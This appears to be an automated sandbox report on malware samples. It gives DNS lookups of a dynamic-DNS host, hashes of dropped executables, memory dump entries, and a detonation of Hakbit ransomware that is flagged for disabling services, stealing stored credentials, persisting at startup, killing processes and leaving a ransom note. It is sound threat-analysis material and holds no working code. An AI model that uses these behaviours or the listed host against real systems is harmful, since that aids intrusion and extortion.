US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp
US 8.8.8.8:53 sandyclark255.hopto.org udp

Files

memory/2096-0-0x0000000074371000-0x0000000074372000-memory.dmp

memory/2096-1-0x0000000074370000-0x000000007491B000-memory.dmp

memory/2096-2-0x0000000074370000-0x000000007491B000-memory.dmp

memory/2096-3-0x0000000074370000-0x000000007491B000-memory.dmp

\Users\Admin\AppData\Local\Temp\VJ3Ebnlo2TU3rNhb.exe

MD5 2819e45588024ba76f248a39d3e232ba
SHA1 08a797b87ecfbee682ce14d872177dae1a5a46a2
SHA256 b82b23059e398b39f183ec833d498200029033b0fd3a138b6c2064a6fa3c4b93
SHA512 a38b58768daf58fa56ca7b8c37826d57e9dbfcd2dedf120a5b7b9aa36c4e10f64ec07c11dbd77b5861236c005fe5d453523911906dd77a302634408f1d78503a

\Users\Admin\AppData\Local\Temp\aM6N0PLjqIvS2uz6.exe

MD5 9133c2a5ebf3e25aceae5a001ca6f279
SHA1 319f911282f3cded94de3730fa0abd5dec8f14be
SHA256 7c3615c405f7a11f1c217b9ecd1000cf60a37bca7da1f2d12da21cc110b16b4d
SHA512 1d1af3fcfcdba41874e3eb3e2571d25798acfd49b63b7fcf9393be2f59c9ba77e563da1717abcd6445fc52fd6d948bf4c0dd5978a192c8e32e0a9279fd0be33e

memory/528-21-0x0000000074370000-0x000000007491B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\LFd0FZIrV2OMeUao.exe

MD5 f07d2c33e4afe36ec6f6f14f9a56e84a
SHA1 3ebed0c1a265d1e17ce038dfaf1029387f0b53ee
SHA256 309385e6cd68c0dd148905c3147f77383edaf35da9609c0717da7df1a894e3ca
SHA512 b4fbf0e6b8e7e8e1679680039e4ac0aebdf7967a9cc36d9ddac35fa31d997253384a51656d886afb2ded9f911b7b8b44c2dcb8ebe71962e551c5025a4d75ebe2

memory/2792-35-0x0000000074370000-0x000000007491B000-memory.dmp

memory/528-34-0x0000000074370000-0x000000007491B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8AxPFTOJfcYALNsS.exe

MD5 3e804917c454ca31c1cbd602682542b7
SHA1 1df3e81b9d879e21af299f5478051b98f3cb7739
SHA256 f9f7b6f7b8c5068f9e29a5b50afca609018c50ffd61929e1b78124f5381868f1
SHA512 28e59bc545179c2503771b93d947930bd56f8ebd0402ecbb398335c5ac89f40051e93fbfd84d35b8c625b253bb4cafea6a5360914b8d54d1bc121977f1eadbaf

C:\Users\Admin\AppData\Local\Temp\hwoRSYStUwBqeomo.exe

MD5 e87459f61fd1f017d4bd6b0a1a1fc86a
SHA1 30838d010aad8c9f3fd0fc302e71b4cbe6f138c0
SHA256 ec1b56551036963a425f6a0564d75980054e01d251c88eb29c81c1b2182f5727
SHA512 dd13993174d234d60ec98124b71bfefcf556c069e482a2e1f127f81f6738b71cd37cee95bf0119d3a61513c01438055767d480e26d6ed260ee16a96533d0cfa2

C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe

MD5 9d2a888ca79e1ff3820882ea1d88d574
SHA1 112c38d80bf2c0d48256249bbabe906b834b1f66
SHA256 8b5b38085f12d51393ed5a481a554074d3c482d53ecd917f2f5dffdf3d2ee138
SHA512 17a9f74ecf9f118ed0252fa0bc6ce0f9758a4dc75f238cae304def9c37cd94623818dd4aef38826642ff9e549b7e6047318f8bf6de7edff2d61a298d0bf5c840

memory/2668-58-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/2668-64-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/2096-69-0x0000000074370000-0x000000007491B000-memory.dmp

memory/2668-67-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/2668-66-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2668-62-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/2668-60-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/2668-56-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/2668-54-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/2668-52-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/2668-50-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/1304-89-0x0000000000400000-0x0000000000554000-memory.dmp

memory/1304-91-0x0000000000400000-0x0000000000554000-memory.dmp

memory/1304-88-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1304-86-0x0000000000400000-0x0000000000554000-memory.dmp

memory/1304-84-0x0000000000400000-0x0000000000554000-memory.dmp

memory/1304-82-0x0000000000400000-0x0000000000554000-memory.dmp

memory/1304-80-0x0000000000400000-0x0000000000554000-memory.dmp

memory/1304-78-0x0000000000400000-0x0000000000554000-memory.dmp

memory/1304-76-0x0000000000400000-0x0000000000554000-memory.dmp

memory/1304-74-0x0000000000400000-0x0000000000554000-memory.dmp

memory/2196-134-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/2196-132-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/2196-131-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2196-129-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/2196-127-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/2196-125-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/2196-123-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/2196-121-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/2196-119-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/1452-110-0x0000000000400000-0x000000000040F000-memory.dmp

memory/1452-109-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1452-107-0x0000000000400000-0x000000000040F000-memory.dmp

memory/1452-105-0x0000000000400000-0x000000000040F000-memory.dmp

memory/1452-103-0x0000000000400000-0x000000000040F000-memory.dmp

memory/1452-101-0x0000000000400000-0x000000000040F000-memory.dmp

memory/1452-99-0x0000000000400000-0x000000000040F000-memory.dmp

memory/1452-97-0x0000000000400000-0x000000000040F000-memory.dmp

memory/528-145-0x0000000074370000-0x000000007491B000-memory.dmp

memory/528-146-0x0000000074370000-0x000000007491B000-memory.dmp

memory/528-147-0x0000000074370000-0x000000007491B000-memory.dmp

memory/2792-148-0x0000000074370000-0x000000007491B000-memory.dmp

memory/528-240-0x0000000074370000-0x000000007491B000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-12-02 00:53

Reported

2024-12-02 00:58

Platform

win7-20240729-en

Max time kernel

19s

Max time network

16s

Command Line

"C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe"

Signatures

Disables service(s)

evasion execution

Hakbit

ransomware hakbit

Hakbit family

hakbit

Renames multiple (57) files with added filename extension

ransomware

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A

Reads user/profile data of web browsers

spyware stealer

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\System32\notepad.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1744 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\sc.exe
PID 1744 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\sc.exe
PID 1744 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\sc.exe
PID 1744 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\cmd.exe
PID 1744 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\cmd.exe
PID 1744 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\cmd.exe
PID 1744 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\sc.exe
PID 1744 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\sc.exe
PID 1744 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\sc.exe
PID 1744 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\sc.exe
PID 1744 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\sc.exe
PID 1744 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\sc.exe
PID 1744 wrote to memory of 2420 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\sc.exe
PID 1744 wrote to memory of 2420 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\sc.exe
PID 1744 wrote to memory of 2420 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\sc.exe
PID 1744 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
PID 1744 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\system32\taskkill.exe
